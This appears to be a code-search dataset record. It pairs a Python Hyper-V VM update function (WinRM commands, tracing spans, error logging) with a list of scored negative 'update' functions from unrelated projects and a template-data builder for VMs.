command child_span = opentracing.tracer.start_span('generate_command', child_of=span) cmd = utils.JINJA_ENV.get_template('vm/hyperv/commands/update.j2').render(**template_data) child_span.finish() # Open a client and run the two necessary commands on the host updated = False try: child_span = opentracing.tracer.start_span('update_vm', child_of=span) response = Windows.deploy(cmd, host_name, child_span) span.set_tag('host', host_name) child_span.finish() except WinRMError as err: error = f'Exception occurred while attempting to update VM #{vm_id} on {host_name}.' Windows.logger.error(error, exc_info=True) vm_data['errors'].append(f'{error} Error: {err}') span.set_tag('failed_reason', 'winrm_error') else: # Check the stdout and stderr for messages if response.std_out: msg = response.std_out.strip() Windows.logger.debug(f'VM update command for VM #{vm_id} generated stdout\n{msg}') updated = 'VM Successfully Updated' in msg # Check if the error was parsed to ensure we're not logging invalid std_err output if response.std_err and '#< CLIXML\r\n' not in response.std_err: msg = response.std_err.strip() Windows.logger.error(f'VM update command for VM #{vm_id} generated stderr\n{msg}') # Check if we need to restart the VM as well if template_data['restart']: # Also render and deploy the restart_cmd template restart_cmd = utils.JINJA_ENV.get_template('vm/hyperv/commands/restart.j2').render(**template_data) # Attempt to execute the restart command Windows.logger.debug(f'Executing restart command for VM #{vm_id}') child_span = opentracing.tracer.start_span('restart_vm', child_of=span) response = Windows.deploy(restart_cmd, host_name, child_span) child_span.finish() if response.std_out: msg = response.std_out.strip() Windows.logger.debug(f'VM restart command for VM #{vm_id} generated stdout\n{msg}') # Check if the error was parsed to ensure we're not logging invalid std_err output if response.std_err and '#< CLIXML\r\n' not in response.std_err: msg = response.std_err.strip() error = f'VM restart command for VM #{vm_id} generated stderr\n{msg}' vm_data['errors'].append(error) Windows.logger.error(error) return updated
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update():\n return 'update api in put'", "def update(self, params):", "def _update_from_rest_data(self) -> None:", "def vm_update(args):\n ip1 = args.ip1\n flavor = args.flavor\n numcpus = args.numcpus\n memory = args.memory\n plan = args.plan\n autostart = args.autostart\n noautostart = args.noautostart\n dns = args.dns\n host = args.host\n domain = args.domain\n cloudinit = args.cloudinit\n template = args.template\n net = args.network\n information = args.information\n iso = args.iso\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n for name in names:\n if dns:\n common.pprint(\"Creating Dns entry for %s...\" % name)\n if net is not None:\n nets = [net]\n else:\n nets = k.vm_ports(name)\n if nets and domain is None:\n domain = nets[0]\n if not nets:\n return\n else:\n k.reserve_dns(name=name, nets=nets, domain=domain, ip=ip1)\n elif ip1 is not None:\n common.pprint(\"Updating ip of vm %s to %s...\" % (name, ip1))\n k.update_metadata(name, 'ip', ip1)\n elif cloudinit:\n common.pprint(\"Removing cloudinit information of vm %s\" % name)\n k.remove_cloudinit(name)\n return\n elif plan is not None:\n common.pprint(\"Updating plan of vm %s to %s...\" % (name, plan))\n k.update_metadata(name, 'plan', plan)\n elif template is not None:\n common.pprint(\"Updating template of vm %s to %s...\" % (name, template))\n k.update_metadata(name, 'template', template)\n elif memory is not None:\n common.pprint(\"Updating memory of vm %s to %s...\" % (name, memory))\n k.update_memory(name, memory)\n elif numcpus is not None:\n common.pprint(\"Updating numcpus of vm %s to %s...\" % (name, numcpus))\n k.update_cpus(name, numcpus)\n elif autostart:\n common.pprint(\"Setting autostart for vm %s...\" % name)\n k.update_start(name, start=True)\n elif noautostart:\n common.pprint(\"Removing autostart for vm %s...\" % name)\n k.update_start(name, start=False)\n elif information:\n common.pprint(\"Setting information for vm %s...\" % name)\n k.update_descrmation(name, information)\n elif iso is not None:\n common.pprint(\"Switching iso for vm %s to %s...\" % (name, iso))\n k.update_iso(name, iso)\n elif flavor is not None:\n common.pprint(\"Updating flavor of vm %s to %s...\" % (name, flavor))\n k.update_flavor(name, flavor)\n elif host:\n common.pprint(\"Creating Host entry for vm %s...\" % name)\n nets = k.vm_ports(name)\n if not nets:\n return\n if domain is None:\n domain = nets[0]\n k.reserve_host(name, nets, domain)", "def update( ):\r\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update():", "def update():", "async def update(self):\n\t\tstate = await self._client.get_state('command.cgi?cmd=getObject&oid={0}&ot={1}'.format(self._oid,self._ot))\n\t\tif state is not None:\n\t\t\tself._raw_result = state", "def update_data():\n pass", "def test_update_vip(self):\r\n resource = 'vip'\r\n cmd = vip.UpdateVip(test_cli20.MyApp(sys.stdout), None)\r\n self._test_update_resource(resource, cmd, 'myid',\r\n ['myid', '--name', 'myname',\r\n '--tags', 'a', 'b'],\r\n {'name': 'myname', 'tags': ['a', 'b'], })", "def test_full_update_vehicle(self):\n vehicle = sample_vehicle(self.user)\n\n payload = {\n 'type': 'VSL',\n 'license_plate': 'BB-123-BB'\n }\n url = detail_url(vehicle.id)\n\n self.client.put(url, payload)\n\n vehicle.refresh_from_db()\n\n 
self.assertEqual(vehicle.type, payload['type'])\n self.assertEqual(vehicle.license_plate, payload['license_plate'])", "def Update(self, controller):\n pass", "def test_update_vip(self):\n resource = 'vip'\n cmd = vip.UpdateVip(test_cli20.MyApp(sys.stdout), None)\n self._test_update_resource(resource, cmd, 'myid',\n ['myid', '--name', 'myname',\n '--tags', 'a', 'b'],\n {'name': 'myname', 'tags': ['a', 'b'], })", "def update(self, *args, **kwargs):", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self):\n _LOGGER.debug(\"update called.\")\n try:\n # Get our Authentication Token from SEMS Portal API\n _LOGGER.debug(\"SEMS - Getting API token\")\n\n # Prepare Login Headers to retrieve Authentication Token\n login_headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n 'token': '{\"version\":\"v2.1.0\",\"client\":\"ios\",\"language\":\"en\"}',\n }\n\n # Prepare Login Data to retrieve Authentication Token\n login_data = '{\"account\":\"'+self._config.get(CONF_USERNAME)+'\",\"pwd\":\"'+self._config.get(CONF_PASSWORD)+'\"}'\n\n # Make POST request to retrieve Authentication Token from SEMS API\n login_response = requests.post(_URL, headers=login_headers, data=login_data, timeout=_RequestTimeout)\n\n # Process response as JSON\n jsonResponse = json.loads(login_response.text)\n\n # Get all the details from our response, needed to make the next POST request (the one that really fetches the data)\n requestTimestamp = jsonResponse[\"data\"][\"timestamp\"]\n requestUID = jsonResponse[\"data\"][\"uid\"]\n requestToken = jsonResponse[\"data\"][\"token\"]\n\n _LOGGER.debug(\"SEMS - API Token recieved: \"+ requestToken)\n # Get the status of our SEMS Power Station\n _LOGGER.debug(\"SEMS - Making Power Station Status API Call\")\n\n # Prepare Power Station status Headers\n headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n 'token': '{\"version\":\"v2.1.0\",\"client\":\"ios\",\"language\":\"en\",\"timestamp\":\"'+str(requestTimestamp)+'\",\"uid\":\"'+requestUID+'\",\"token\":\"'+requestToken+'\"}',\n }\n\n data = '{\"powerStationId\":\"'+self._config.get(CONF_STATION_ID)+'\"}' \n\n response = requests.post(_PowerStationURL, headers=headers, data=data, timeout=_RequestTimeout)\n\n # Process response as JSON\n jsonResponseFinal = json.loads(response.text)\n\n _LOGGER.debug(\"REST Response Recieved\")\n\n for key, value in jsonResponseFinal[\"data\"][\"inverter\"][0][\"invert_full\"].items():\n if(key is not None and value is not None):\n self._attributes[key] = value\n _LOGGER.debug(\"Updated attribute %s: %s\", key, value)\n except Exception as exception:\n _LOGGER.error(\n \"Unable to fetch data from SEMS. 
%s\", exception)", "def update_vm_result(self, context, msg):\n args = jsonutils.loads(msg)\n agent = context.get('agent')\n port_id = args.get('port_uuid')\n result = args.get('result')\n LOG.debug('update_vm_result received from %(agent)s: '\n '%(port_id)s %(result)s', {'agent': agent,\n 'port_id': port_id,\n 'result': result})\n\n # Add the request into queue for processing.\n event_type = 'agent.vm_result.update'\n payload = {'port_id': port_id, 'result': result}\n timestamp = time.ctime()\n data = (event_type, payload)\n # TODO(nlahouti) use value defined in constants\n pri = self.obj.PRI_LOW_START + 10\n self.obj.pqueue.put((pri, timestamp, data))\n LOG.debug('Added request vm result update into queue.')\n\n return 0", "def on_post(self, req, resp):\n data = req.context['doc']\n user = req.context['token']\n vm_id = data['vm_id']\n\n try:\n log.info(\"Attempt to start VM [{}] for user [{}]..\".format(vm_id, user))\n xapi.current_session().start_vm(vm_id)\n except XapiOperationError as xoe:\n # starting a running VM, log and ignore\n log.info(xoe)\n\n info = xapi.current_session().get_vm_info(vm_id)\n log.info(\"Retrieved info of VM [{}].\".format(vm_id))\n\n resp.status = falcon.HTTP_200\n resp.context['result'] = {\n vm_id: {\n 'rdp_ip': info['ip'],\n 'rdp_port': 3389\n }\n }", "def update(self, v_input):\n\n self.v = v_input", "def update(self) -> None:\n ...", "def update(self) -> None:\n dev_id = slugify(self.vehicle.name)\n\n if not self.vehicle.state.is_vehicle_tracking_enabled:\n _LOGGER.debug(\"Tracking is disabled for vehicle %s\", dev_id)\n return\n\n _LOGGER.debug(\"Updating %s\", dev_id)\n attrs = {\"vin\": self.vehicle.vin}\n self._see(\n dev_id=dev_id,\n host_name=self.vehicle.name,\n gps=self.vehicle.state.gps_position,\n attributes=attrs,\n icon=\"mdi:car\",\n )", "def update_virtual_machine(self, vm):\n self.update_cpu(vm)\n self.update_memory(vm)\n signals.vm_updated.send(self.__class__, vm=vm)", "def update(self, psvm, values):\n body = {'psvm': values}\n return self._update(\"/os-psvm/%s\" % base.getid(psvm),\n body,\n \"psvm\")", "def do_update(self, id, data):\n verrors = ValidationErrors()\n if not self.is_loaded():\n verrors.add('ipmi.update', f'{IPMIService.IPMI_DEV!r} could not be found')\n elif id not in self.channels():\n verrors.add('ipmi.update', f'IPMI channel number {id!r} not found')\n elif not data.get('dhcp'):\n for k in ['ipaddress', 'netmask', 'gateway']:\n if not data.get(k):\n verrors.add(f'ipmi_update.{k}', 'This field is required when dhcp is false.')\n verrors.check()\n\n def get_cmd(cmds):\n nonlocal id\n return ['ipmitool', 'lan', 'set', f'{id}'] + cmds\n\n rc = 0\n options = {'stdout': DEVNULL, 'stderr': DEVNULL}\n if data.get('dhcp'):\n rc |= run(get_cmd(id, ['dhcp']), **options).returncode\n else:\n rc |= run(get_cmd(['ipsrc', 'static']), **options).returncode\n rc |= run(get_cmd(['ipaddr', data['ipaddress']]), **options).returncode\n rc |= run(get_cmd(['netmask', data['netmask']]), **options).returncode\n rc |= run(get_cmd(['defgw', 'ipaddr', data['gateway']]), **options).returncode\n\n rc |= run(get_cmd(['vlan', 'id', f'{data.get(\"vlan\", \"off\")}']), **options).returncode\n\n rc |= run(get_cmd(['access', 'on']), **options).returncode\n rc |= run(get_cmd(['auth', 'USER', 'MD2,MD5']), **options).returncode\n rc |= run(get_cmd(['auth', 'OPERATOR', 'MD2,MD5']), **options).returncode\n rc |= run(get_cmd(['auth', 'ADMIN', 'MD2,MD5']), **options).returncode\n rc |= run(get_cmd(['auth', 'CALLBACK', 'MD2,MD5']), **options).returncode\n\n # 
Apparently tickling these ARP options can \"fail\" on certain hardware\n # which isn't fatal so we ignore returncode in this instance. See #15578.\n run(get_cmd(['arp', 'respond', 'on']), **options)\n run(get_cmd(['arp', 'generate', 'on']), **options)\n\n if passwd := data.get('password'):\n cp = run(get_cmd(['ipmitool', 'user', 'set', 'password', '2', passwd]), capture_output=True)\n if cp.returncode != 0:\n err = '\\n'.join(cp.stderr.decode().split('\\n'))\n raise CallError(f'Failed setting password: {err!r}')\n\n cp = run(['ipmitool', 'user', 'enable', '2'], capture_output=True)\n if cp.returncode != 0:\n err = '\\n'.join(cp.stderr.decode().split('\\n'))\n raise CallError(f'Failed enabling user: {err!r}')\n\n return rc", "def update(self):\n #self._switch.odlclient._request_json(self._path, method=\"put\", json={\n # \"flow\": self._odl_inventory()\n #})\n self.remove() # actually, remove only uses self.switch and self.id, so this removes the other entry as well.\n self.deploy()", "def test_aws_service_api_vm_command_put(self):\n pass", "def update(self, *args, **kw):\n pass", "def cmd_update(self):\n self.update_repository()\n results = self.results.getvalue()\n if results:\n print('---')\n print(results, end='')", "async def put(self):\r\n data = await self.request.json()\r\n agent_uuid = data[\"agent_uuid\"]\r\n ip_address = data[\"ip_address\"]\r\n agent_obj = Agent.filter(Agent.uuid == agent_uuid).first()\r\n if not agent_obj:\r\n response_obj = {\"status\": \"failed\"}\r\n logger.error(\"No agent found!!!\")\r\n return web.Response(text=str(response_obj), status=500)\r\n try:\r\n Agent.update(ip_address=ip_address).where(Agent.uuid == agent_uuid)\r\n logger.info(\"Agent updated!!!\")\r\n return web.Response(text=\"successful\", status=200)\r\n except Exception as ex:\r\n response_obj = {\"status\": \"failed\"}\r\n error_message = str(ex)\r\n logger.error(error_message)\r\n return web.Response(text=str(response_obj), status=500)", "def vm_result_update(self, payload):\n\n port_id = payload.get('port_id')\n result = payload.get('result')\n\n if port_id and result:\n # Update the VM's result field.\n params = dict(columns=dict(result=result))\n self.update_vm_db(port_id, **params)", "def test_ipam_vrfs_update(self):\n pass", "def update(self):\n\n\t\tif not self.complete:\n\t\t\tfor vasp_run in self.vasp_run_list:\n\t\t\t\tvasp_run.update()", "def _update(self, host):\n pass", "def update(self,data):\r\n data = data.split(':',1)\r\n\r\n self.log('Signal','Received an update: %s...' 
% repr(data)[0:10],'update')\r\n \r\n #print \"*** local: \" + repr(data)\r\n \r\n if data[0] == 'Results':\r\n\r\n self.log('Signal','The local node returned these passwords: %s' % repr(data[1]),'update')\r\n\r\n self.addResult(data[1])\r\n elif data[0] == 'Bench':\r\n self.log('Signal','The local node returned these benches: %s' % repr(data[1]),'update')\r\n \r\n self.addBench(data[1])\r\n\r\n elif data[0] == 'Work':\r\n if data[1] == 'Done':\r\n self.finished += 1\r\n if self.finished >= len(self.nodes):\r\n self.runningWork = False\r\n self.log('Signal','Finished working','update')\r\n\r\n notification = 'Work:Done'\r\n self.notifyObservers(notification)", "def update_controller(self):", "def update(self):\n self.__execute(self.pkgin_bin, \"update\")", "def _update(self, data):\n self.status = data['status']\n self.progress = data['progress']", "async def update(self) -> None:\n # pause logic\n if not self.running.is_set():\n self.add_to_output(\"Paused...\")\n await self.running.wait()\n\n # tell the user we are updating\n self.add_to_output(f\"Updating...\")\n # create ssh connection to miner\n try:\n conn = await self.get_connection(\"root\", \"admin\")\n # tell the user we are sending the update file\n self.add_to_output(\"Sending upgrade file...\")\n # send the update file\n await self.send_file(UPDATE_FILE_S9, \"/tmp/firmware.tar\")\n # install the update and collect the result\n result = await conn.run(f'sysupgrade /tmp/firmware.tar')\n self.add_to_output(result.stdout.strip())\n # tell the user the update completed\n self.add_to_output(f\"Update completed...\")\n except OSError:\n self.add_to_output(f\"Unknown error...\")", "def update(self, customerguid, name=\"\", login=\"\", password=\"\", email=\"\", address=\"\", vat=\"\", jobguid=\"\", executionparams=None):", "def update(self):\n\n pass", "def update(self):\n return self._process('update')", "def update(self):\n sess = u.get_default_session()\n # sess.run(self.update_op)\n u.run(self.update_op)", "def update(self, data):\n if self.service is not None:\n self.service.update_response(data)", "def update_data(update_method):\n log.debug('Starting update')\n cmd = ['/usr/bin/python', wf.workflowfile('update.py')]\n if update_method == 'force':\n cmd.append('--update')\n cmd.append('force')\n\n # Update projects data\n log.debug('Run update command : {}'.format(cmd))\n run_in_background('update', cmd)\n\n return 0", "def testUpdate(self):\n response = self.runPut(self.root, sequencer=self.hiseq2000.sodar_uuid, data=self.post_data)\n self.response_200(response)\n data = json.loads(response.content.decode(\"utf-8\"))\n self.assertEqual(data[\"vendor_id\"], self.post_data[\"vendor_id\"])", "def put(self, id):\n context = request.environ.get('context')\n obj = dbapi.netdevice_data_update(context, id, request.json)\n resp = {\"data\": jsonutils.to_primitive(obj.variables)}\n return resp, 200, None", "def update(self) -> None:\n\n try:\n request = requests.get(self.url, timeout=10)\n except requests.exceptions.RequestException as err:\n _LOGGER.error(\"No connection to endpoint: %s\", err)\n else:\n doc = xmltodict.parse(request.text)\n mtus = int(doc[\"LiveData\"][\"System\"][\"NumberMTU\"])\n\n for mtu in range(1, mtus + 1):\n power = int(doc[\"LiveData\"][\"Power\"][\"MTU%d\" % mtu][\"PowerNow\"])\n voltage = int(doc[\"LiveData\"][\"Voltage\"][\"MTU%d\" % mtu][\"VoltageNow\"])\n\n self.data[mtu] = {\n UnitOfPower.WATT: power,\n UnitOfElectricPotential.VOLT: voltage / 10,\n }", "def update_put():\n try:\n 
update.launcher.start_async()\n except update.launcher.AlreadyInProgressError:\n # If an update is already in progress, treat it as success.\n pass\n except update.launcher.Error as e:\n return json_response.error(str(e)), 200\n return json_response.success()", "def handle_wps_update(self, data):\n\n self.jobs = data", "def update_vm(client, resource_group_name, vm_name, **kwargs):\n return client.update(resource_group_name, vm_name, kwargs['parameters'].tags)", "def update(self, **options):\n pass", "def remote_Update(self, data):\r\n\t\t# server doesn't need to know if this fails\r\n\t\t# the server should be infallable, so the problem is in the client\r\n\t\ttry:\r\n\t\t\treturn self.onUpdate(data)\r\n\t\texcept Exception, e:\t# the client might be out of date\r\n\t\t\tlog.err(\"Unable to handle data: %s\" % data)\r\n\t\t\tlog.err(e)", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def test_aws_service_api_vm_patch(self):\n pass", "def update(*args):", "def update(self) -> None:\n pass", "def update(self) -> None:\n pass", "def post_virtual_machine_update(self, resource_id, resource_dict):\n pass", "def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)", "def refresh_vm(context, vm):\n vapp = vm.getVirtualAppliance()\n return vapp.getVirtualMachine(vm.getId())", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, data):\n return data", "def __send_update(self):\n\n offset = self.app_id * 10\n\n # TODO set number of leading zero depending on max value\n print(\"Update run {}: {} {}/{} with {}S - {}F - {}B\".format(self.app_id,\n self.test_run.date,\n self.test_run.actual,\n self.test_run.total,\n self.test_run.succeed,\n self.test_run.failed,\n self.test_run.blocked))\n\n status_dict = {}\n # Test run advance status string\n status_dict[offset + self.PIN_STATUS_TEXT] = \"{}/{}\".format(self.test_run.actual,\n self.test_run.total)\n # Test run advance status percent\n percent = self.test_run.actual / self.test_run.total * 100\n status_dict[offset + self.PIN_STATUS_GRAPH] = percent\n # Test run result type number\n status_dict[offset + self.PIN_TYPES] = \"S{} F{} B{}\".format(self.test_run.succeed,\n self.test_run.failed,\n self.test_run.blocked)\n # Test run led TODO manage color\n status_dict[offset + self.PIN_LED] = 255\n\n self.post_dict(status_dict)", "def update(self):\n self._client.patch(self)", "def update_volumes():\n print 'do something useful here'", "def update(self):\r\n pass", "def update(self) -> None:\n pass", "def update(self):\n self.data_service.update()\n self._state = self.data_service.data.get(self._json_key)\n self._attributes = self.data_service.attributes.get(self._json_key)\n self._unit_of_measurement = self.data_service.unit", "def update(self):\n 
self.data_service.update()\n self._state = self.data_service.data.get(self._json_key)\n self._attributes = self.data_service.attributes.get(self._json_key)\n self._unit_of_measurement = self.data_service.unit", "def xnat_workflow_info_update(args):\n\trequest_url = \"http://\" + args.server + \"/data/services/workflows/workflowid/\" + args.workflow_id + \"?format=json\"\n\tprint(\"xnat_workflow_info update: request_url: \" + request_url)\n\tresponse = requests.get(request_url, auth=(args.username, args.password))\n\n\tjson_response = json.loads(response.text)\n\tjson_items = json_response['items']\n\tjson_item = json_items[0]\n\tjson_data_fields = json_item['data_fields']\n\n\tput_url = \"http://\" + args.server + \"/REST/workflows\"\n\n\t# workflow identifying information\n\tput_url += \"?wrk:workflowData/id=\" + json_data_fields['ID']\n \tput_url += \"&wrk:workflowData/pipeline_name=\" + json_data_fields['pipeline_name']\n\tput_url += \"&wrk:workflowData/launch_time=\" + json_data_fields['launch_time']\n\tput_url += \"&wrk:workflowData/data_type=\" + json_data_fields['data_type']\n\t# workflow information to be updated\n \tput_url += \"&wrk:workflowData/status=\" + \"In Progress\"\n \tput_url += \"&wrk:workflowData/current_step_id=\" + args.step_id\n\tput_url += \"&wrk:workflowData/step_description=\" + args.step_description\n\tput_url += \"&wrk:workflowData/percentageComplete=\" + args.percent_complete\n\tput_url += \"&wrk:workflowData/current_step_launch_time=\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n\tput_url = put_url.replace(\" \", \"%20\");\n\n\tprint(\"xnat_workflow_info update: put_url: \" + put_url)\n\n\tresponse = requests.put(put_url, auth=(args.username, args.password))\n\tif (response.status_code != 200):\n\t\tprint(\"Cannot update workflow\")\n\t\tprint(\"response.status_code: \" + str(response.status_code))\n\n\txnat_workflow_info_show(args)", "def update_avm_device() -> None:\n _async_add_entities(avm_wrapper, async_add_entities, data_fritz)", "def test_partial_update_vehicle(self):\n vehicle = sample_vehicle(user=self.user)\n\n payload = {\n 'type': 'VSL'\n }\n url = detail_url(vehicle.id)\n self.client.patch(url, payload)\n\n vehicle.refresh_from_db()\n self.assertEqual(vehicle.type, payload['type'])", "def send_lsp_update(lsp_name, new_path):\n print(\"Updating \", lsp_name, \"on NorthStar Controller\")\n requs = requests.get(\n 'https://' + server_ip +\n ':8443/NorthStar/API/v1/tenant/1/topology/1/te-lsps/',\n headers=auth_header, verify=False)\n dump = json.dumps(requs.json())\n lsp_list = json.loads(dump)\n # Find target LSP to use lspIndex\n for lsp in lsp_list:\n if lsp['name'] == lsp_name:\n break\n # Fill only the required fields\n # ero = ero_input\n ero = []\n\n # Build new ERO Data\n\n print lsp\n for ip_address in new_path:\n hop = {\n \"topoObjectType\": \"ipv4\",\n \"address\": ip_address,\n # \"loose\" : True,\n }\n ero.append(hop)\n new_lsp = {}\n# \"provisioningType\":\"SR\"\n for key in ('from', 'to', 'name', 'lspIndex', 'pathType', 'provisioningType'):\n new_lsp[key] = lsp[key]\n\n new_lsp['plannedProperties'] = {\n \"bandwidth\": \"100M\",\n 'ero': ero\n # 'calculatedEro' : []\n #'preferredEro' : ero\n }\n response = requests.put(\n 'https://10.10.2.64:8443/NorthStar/API/v1/tenant/1/topology/1/te-lsps/' + str(new_lsp[\n 'lspIndex']),\n json=new_lsp, headers=auth_header, verify=False)\n print(\"LSP Updated on NorthStar Controller\")\n print response", "async def async_update(self):", "def update(self, args):\n pass" ]
[ "0.67325056", "0.65831465", "0.64099467", "0.6401777", "0.6338021", "0.62686175", "0.62686175", "0.62686175", "0.62686175", "0.62159324", "0.62159324", "0.61146724", "0.61023915", "0.60943973", "0.6088066", "0.60478616", "0.60464793", "0.60435563", "0.6035188", "0.6035188", "0.6035188", "0.60291815", "0.602483", "0.6017324", "0.6012739", "0.5989964", "0.5985558", "0.59761703", "0.59746665", "0.5974125", "0.5969755", "0.5961766", "0.5947018", "0.59361064", "0.5925462", "0.5923477", "0.59228253", "0.5878553", "0.58629924", "0.5860692", "0.58544075", "0.5833168", "0.5814709", "0.5814363", "0.5800615", "0.580026", "0.5797017", "0.57926714", "0.57887155", "0.5786818", "0.5784597", "0.5780157", "0.5776485", "0.57550883", "0.57532424", "0.5748896", "0.5740837", "0.573285", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5715519", "0.5710936", "0.571056", "0.571056", "0.5687538", "0.56801456", "0.5675466", "0.5672461", "0.5672461", "0.5672461", "0.5672461", "0.5672461", "0.5672461", "0.5665908", "0.5655419", "0.56540626", "0.5640595", "0.56328607", "0.5631472", "0.5629619", "0.5629619", "0.5624228", "0.56202", "0.5612361", "0.5600806", "0.55957955", "0.55931866" ]
0.6388902
4
Given the vm data from the API, create a dictionary that contains all of the necessary keys for the template. The keys will be checked in the update method and not here; this method is only concerned with fetching the data that it can.
def _get_template_data(vm_data: Dict[str, Any], span: Span) -> Optional[Dict[str, Any]]: vm_id = vm_data['id'] Windows.logger.debug(f'Compiling template data for VM #{vm_id}') data: Dict[str, Any] = {key: None for key in Windows.template_keys} data['vm_identifier'] = f'{vm_data["project"]["id"]}_{vm_id}' # changes changes: Dict[str, Any] = { 'ram': False, 'cpu': False, 'storages': False, } updates = vm_data['history'][0] try: if updates['ram_quantity'] is not None: # RAM is needed in MB for the updater but we take it in in GB (1024, not 1000) changes['ram'] = vm_data['ram'] * 1024 except KeyError: pass try: if updates['cpu_quantity'] is not None: changes['cpu'] = vm_data['cpu'] except KeyError: pass # Fetch the drive information for the update try: if len(updates['storage_histories']) != 0: Windows.logger.debug(f'Fetching drives for VM #{vm_id}') child_span = opentracing.tracer.start_span('fetch_drive_updates', child_of=span) changes['storages'] = Windows.fetch_drive_updates(vm_data) child_span.finish() except KeyError: pass # Add changes to data data['changes'] = changes data['storage_type'] = vm_data['storage_type'] data['vms_path'] = settings.HYPERV_VMS_PATH # Get the host name of the server host_name = None for interface in vm_data['server_data']['interfaces']: if interface['enabled'] is True and interface['ip_address'] is not None: if IPAddress(str(interface['ip_address'])).version == 6: host_name = interface['hostname'] break if host_name is None: error = f'Host ip address not found for the server # {vm_data["server_id"]}.' Windows.logger.error(error) vm_data['errors'].append(error) return None # Add the host information to the data data['host_name'] = host_name # Determine restart data['restart'] = vm_data['restart'] return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_template_data(vm_data: Dict[str, Any], span: Span) -> Optional[Dict[str, Any]]:\n vm_id = vm_data['id']\n Windows.logger.debug(f'Compiling template data for VM #{vm_id}')\n data: Dict[str, Any] = {key: None for key in Windows.template_keys}\n\n data['vm_identifier'] = f'{vm_data[\"project\"][\"id\"]}_{vm_id}'\n data['image_answer_file_name'] = vm_data['image']['answer_file_name']\n\n data['image_filename'] = vm_data['image']['filename']\n # check if file exists at /mnt/images/HyperV/VHDXs/\n path = '/mnt/images/HyperV/VHDXs/'\n child_span = opentracing.tracer.start_span('vm_image_file_download', child_of=span)\n if not Windows.check_image(data['image_filename'], path):\n # download the file\n downloaded, errors = Windows.download_image(data['image_filename'], path)\n if not downloaded:\n for error in errors:\n Windows.logger.error(error)\n vm_data['errors'].append(error)\n return None\n child_span.finish()\n\n # RAM is needed in MB for the builder but we take it in in GB (1024, not 1000)\n data['ram'] = vm_data['ram'] * 1024\n data['cpu'] = vm_data['cpu']\n data['dns'] = vm_data['dns']\n\n # Generate encrypted passwords\n data['admin_password'] = Windows._password_generator(size=12)\n # Also save the password back to the VM data dict\n vm_data['admin_password'] = data['admin_password']\n\n # Check for the primary storage\n if not any(storage['primary'] for storage in vm_data['storages']):\n error = 'No primary storage drive found. Expected one primary storage drive'\n Windows.logger.error(error)\n vm_data['errors'].append(error)\n return None\n\n data['storages'] = vm_data['storages']\n data['storage_type'] = vm_data['storage_type']\n\n # Get the Networking details\n data['vlans'] = []\n data['ip_addresses'] = []\n data['default_ips'] = []\n data['default_gateway'] = ''\n data['default_netmask_int'] = ''\n data['default_vlan'] = ''\n\n # The private IPs for the VM will be the one we need to pass to the template\n vm_data['ip_addresses'].reverse()\n ip_addresses = []\n subnets = []\n for ip in vm_data['ip_addresses']:\n if IPAddress(ip['address']).is_private():\n ip_addresses.append(ip)\n subnets.append({\n 'address_range': ip['subnet']['address_range'],\n 'vlan': ip['subnet']['vlan'],\n 'id': ip['subnet']['id'],\n })\n # Removing duplicates\n subnets = [dict(tuple_item) for tuple_item in {tuple(subnet.items()) for subnet in subnets}]\n # sorting nics (each subnet is one nic)\n for subnet in subnets:\n non_default_ips = []\n gateway, netmask_int = subnet['address_range'].split('/')\n vlan = str(subnet['vlan'])\n data['vlans'].append(vlan)\n\n for ip_address in ip_addresses:\n address = ip_address['address']\n if ip_address['subnet']['id'] == subnet['id']:\n # Pick the default ips if any\n if vm_data['gateway_subnet'] is not None:\n if subnet['id'] == vm_data['gateway_subnet']['id']:\n data['default_ips'].append(address)\n data['default_gateway'] = gateway\n data['default_netmask_int'] = netmask_int\n data['default_vlan'] = vlan\n continue\n # else store the non gateway subnet ips\n non_default_ips.append(address)\n\n if len(non_default_ips) > 0:\n data['ip_addresses'].append({\n 'ips': non_default_ips,\n 'gateway': gateway,\n 'netmask_int': netmask_int,\n 'vlan': vlan,\n })\n\n # Add locale data to the VM\n data['language'] = 'en_IE'\n data['timezone'] = 'GMT Standard Time'\n\n # Get the host name of the server\n host_name = None\n for interface in vm_data['server_data']['interfaces']:\n if interface['enabled'] is True and interface['ip_address'] is not None:\n if 
